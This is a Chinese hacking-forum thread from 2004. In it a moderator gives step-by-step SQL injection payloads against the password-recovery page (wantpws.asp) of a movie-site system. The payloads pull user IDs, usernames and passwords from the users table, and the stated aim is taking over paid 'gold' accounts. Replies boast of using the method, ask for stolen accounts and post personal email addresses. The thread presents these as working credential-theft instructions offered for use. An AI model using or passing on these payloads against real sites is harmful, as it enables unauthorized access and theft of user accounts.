论坛: 菜鸟乐园 标题: 今天用SQL注入得到N个电影黄金帐户,方法如下 复制本贴地址    
作者: abctm [abctm]    版主   登录
原因是由于程序员的错误引起的

文件是
wantpws.asp

用google搜索一下找到

如果你忘记了自己的密码
如果你忘记了自己的密码,请在如下表单里输入你的密码
提示信息!. 你注册用户名: 密码提示问题: 提示答案:.

之类的,能进入的话

用户名填写
riyueshuangxing
密码填写
riyueshuangxing
密码提示问题填写
a' union select id from users where oklook=3 or '0

得到的是id号

10

然后后退重新提交

密码提示问题填写

a' union select userid from users where id=10 or '0

id=?写你得到的

得到用户名

继续提交
a' union select password from users where id=10 or '0
得到密码
进入首页登陆即可

如果你登陆的时候提示已经登陆不要紧张,因为已经有人用这个方法得到密码登陆正在看

本文藏了一个秘密大家找找
其实用户名,密码可以随便填

地主 发表时间: 04-06-01 22:43

回复: abctm [abctm]   版主   登录
不过现在漏洞不多了,要尝试的行动要快

B1层 发表时间: 04-06-01 22:45

回复: gzy2598 [gzy2598]   论坛用户   登录
哈哈 你小子 我找到秘密啦 我还得仔细看 才看清 真小嘿

B2层 发表时间: 04-06-02 01:13

回复: abctm [abctm]   版主   登录
大家不要泄漏得到的帐户和密码。ip和域名也不要泄漏。以免引起问题

B3层 发表时间: 04-06-02 06:07

回复: iamzhaokun [iamzhaokun]      登录
双星,给我一个吧(N-1),不过分吧? iamzhaokun@163.com

B4层 发表时间: 04-06-02 10:15

回复: wewei [weili]   论坛用户   登录
这位大虾,给我一个吧,abd17907@yahoo.com


你写的那些东西虽然看不懂,可我正在学.


B5层 发表时间: 04-06-02 13:26

回复: wewei [weili]   论坛用户   登录
这位大虾,给我一个吧,abd17907@yahoo.com.cn


你写的那些东西虽然看不懂,可我正在学.


B6层 发表时间: 04-06-02 13:27

回复: w181948297 [w181948297]   论坛用户   登录
我也发现了啊 !!哈哈 !双星真会搞笑啊!1但是我喜欢!!

B7层 发表时间: 04-06-02 17:02

回复: wpsbaby [wpsbaby]   论坛用户   登录
可以告诉我吗什么秘密!!俺是菜鸟!!


B8层 发表时间: 04-06-02 17:56

回复: zhangyun [zhangyun]   论坛用户   登录
人笨了
  没办法啊
  看不倒!~~~~~~

B9层 发表时间: 04-06-02 18:14

回复: chy_tzl [chy_tzl]   论坛用户   登录
唉!电影是找到了可双星老大说的秘密我没找到郁闷呀

B10层 发表时间: 04-06-02 18:46

回复: zypzyp [zypzyp]   论坛用户   登录
郁闷啊 
别人能看懂我看不懂
别人都能用我不能用
别人能想出来我想不出来
别人都是天才我是傻瓜
楼主送我个好吧zyp6087274@163.com
非常感激

B11层 发表时间: 04-06-02 20:03

回复: tianya2003 [tianya2003]   论坛用户   登录
呵呵,双星玩的把戏你还不知道呀,用鼠标把他的帖子选定看看最下面呀!

B12层 发表时间: 04-06-02 20:55

回复: neeao [neeao]   论坛用户   登录
现在金梅的帐号强暴器软件都已经出来了!
金梅4也有这个漏洞的!

B13层 发表时间: 04-06-02 21:58

回复: abctm [abctm]   版主   登录
软件多麻烦
有秘密不要说

B14层 发表时间: 04-06-02 22:13

回复: DarkRock [darkrock]   论坛用户   登录
好用, 嘿嘿,  又看了一个视频  太他妈容易啦, 嘿嘿哈哈, 狂笑, 
N年没当过坏客了。

B15层 发表时间: 04-06-02 22:32

回复: duxinyao [duxinyao]   论坛用户   登录
好狡猾的双星哦!你在打广告?

B16层 发表时间: 04-06-03 07:44

回复: lijingxi [lijingxi]   见习版主   登录
双星  你说的漏洞是  金梅3  电影系统漏洞吧!
很多人都是下载了这套电影程序美化以后拿出来做电影网站的!
不过这个漏洞已经很久了!


B17层 发表时间: 04-06-03 08:08

回复: zhangyun [zhangyun]   论坛用户   登录
  晕啊
是这个:[实用户名,密码可以随便填]
      倒啊!~~~~~~~

B18层 发表时间: 04-06-03 12:18

回复: abctm [abctm]   版主   登录
是啊,那天无聊之极了,所以随便写来玩玩的

B19层 发表时间: 04-06-03 12:44

回复: lijingxi [lijingxi]   见习版主   登录
双星你好狡猾啊! 哈哈! 要不是有人说我还没有发现你这样狡猾啊!
哈哈! 乐死我了!

B20层 发表时间: 04-06-03 12:52

回复: abctm [abctm]   版主   登录
狡猾吧

B21层 发表时间: 04-06-03 22:07

回复: mj8314 [mj8314]   论坛用户   登录
能给我一个吗
我没看懂你杂破的呀
兄弟教教我呀
给个帐号用用呀
majun4678@163.com

B22层 发表时间: 04-06-05 02:55

回复: rheazhu [rheazhu]   论坛用户   登录
哈哈,,,,,用户名和密码任意....

哪学来的,我想了解下,原理!~~

B23层 发表时间: 04-06-05 12:44

回复: wubo [wubo]   论坛用户   登录
为为!我要~~~行```lovewubo2000@yahoo.com.cn

B24层 发表时间: 05-11-04 17:02

回复: qwhacker [qwhacker]      登录
我早就知道这个漏洞了。也用过。只是漏洞不太好找。
我也看看是什么密码:qwhacker@126.com

B25层 发表时间: 05-11-05 12:11

回复: icekzl [icekzl]   论坛用户   登录
不好多说--
都是前辈--都是高手-
慢慢学

B26层 发表时间: 05-11-21 22:48

论坛: 菜鸟乐园

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号